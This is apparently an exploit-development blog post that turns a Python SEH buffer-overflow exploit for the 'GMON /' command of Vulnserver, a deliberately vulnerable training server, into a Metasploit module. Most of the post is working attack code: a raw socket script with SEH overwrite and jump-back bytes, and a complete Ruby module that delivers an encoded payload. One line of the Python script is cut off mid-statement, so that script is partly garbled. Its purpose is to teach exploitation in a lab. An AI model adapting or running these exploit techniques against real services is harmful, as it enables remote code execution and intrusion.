Porting VunServer “GMON /” SEH exploit to Metasploit

Pre-requisites :  http://resources.infosecinstitute.com/seh-exploit/
Coerelan template : http://resources.infosecinstitute.com/stack-based-buffer-overflow-tutorial-part-1-%E2%80%94-introduction/

Re-freshers of the SEH exploit

Now onto the python code 🙂

import sys
import struct
import socket

shellcode=("\xCC\xCC\xCC") #use your own Shellcode bad chars \x00\x0A\x0D
sehp = "\xEB\x0F\x90\x90"; # JMP 0F(15), NOP, NOP (POINTER TO NEXT SEH RECORD)
seho = struct.pack(' longjump = "\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF" # JMP back 768 bytes
buffer= "\x90" * 2752 + "\x90" * 32 + shellcode + "\x90" * (714 - len(shellcode)) + sehp + seho + longjump + "D" *480
#makenops 2752 + 32 = 2784
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1',9999))
data=s.recv(1024)
s.send('GMON /' + buffer)
s.close()

This makes the metasploit exploit

# Metasploit template from corelan.be
# SEH for vunserver thegreycorner.com
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote # A remote exploit

include Msf::Exploit::Remote::Tcp # using TCP connection

def initialize(info = {})
super(update_info(info,
'Name' => 'Vunserver SEH exploit',
'Description' => %q{
This module exploits an SEH exploit in
vulnserver.
},
'Author' => [ 'Stephen Bradshaw','Duncan Winfrey' ],
'Version' => '$Revision: 9999 $',
'References' =>
[
[ 'Vunserver', 'http://www.thegreycorner.com/p/vulnserver.html' ],
[ 'corelan.be', 'http://tinyurl.com/64s3je4' ],
],

'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x0a\x0d",
},
'Platform' => 'win',

'Targets' =>
[
['Windows NT/2000/XP/2003 ',
{ 'Ret' => 0x625010b4,} ],
],
'DefaultTarget' => 0,

'Privileged' => false
))

register_options(
[
Opt::RPORT(9999)
], self.class)
end

def exploit
connect

request = 'GMON /'
request << rand_text_alpha_upper(2752)
request << make_nops(32)
request << payload.encoded
request << rand_text_alpha_upper((714 - payload.encoded.length))
request << "\xEB\x0F\x90\x90" # Short Jump
request << [target.ret].pack('V') # SEH Overwrite
request << "\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF" # go back 768 bytes
request << rand_text_alpha_upper(480) # junk

sock.put(request)

handler
disconnect

end

The working module 🙂

 

 

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.